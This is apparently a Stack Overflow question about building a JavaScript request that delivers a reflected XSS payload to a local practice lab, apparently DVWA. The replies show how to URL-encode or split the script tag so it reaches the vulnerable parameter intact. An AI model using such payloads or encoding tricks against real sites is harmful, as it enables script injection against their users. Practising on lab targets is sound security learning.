# How to craft HTML tags in javascript HTTP request?

Tags: javascript, html

I am trying to craft an http request that will take advantage of an XSS reflected vulnerability. I'm trying to embed the following `<script>alert("xss");</script>`. The problem is that I'm not being able to craft it directly at the string that will be concatenated later on URL. That's because special chars are recognized as HTML tags. To overcome this I tried to write their respective entities in `var payload`. Like this.

```
<script>
    var http = new XMLHttpRequest();
    http.onreadystatechange = function(){
        console.log(http.response);    
        };
    var payload = "&lt;script&gt;alert('xss');&lt;/script&gt;";
    http.open("GET","http://localhost:81/vulnerabilities/xss_r/?name="+payload,true);
    http.send();
</script>
```

The HTTP request is successful but the URL is parsed like [this](https://i.stack.imgur.com/TJ15f.jpg). Which is not what I want. I would like to get something like `name=<script>alert("XSS");</script>`.

Comment: Try URL encode instead of HTML encode. `var payload = escape('<script>alert("xss");</scr'+'ipt>');`

Comment: Clearly ampersands are used to separate querystring params so you can’t just jam them into a url willy nilly.

Answer (score 1, accepted):

Try this:

```
var payload = '<' + 'script>alert("xss");' + '<' + '/script>';
```

Comment: Works like a charm! Perhaps you can explain why entities are not parsed?